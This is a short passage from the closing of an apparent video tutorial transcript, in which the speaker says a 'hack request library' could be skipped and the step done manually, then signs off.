guess if you didn't want to install that hack request library, you could just do it manually relatively easily. So with that being said, that's going to be the video. Hope you guys enjoyed it. Take care, and I will see you all next time.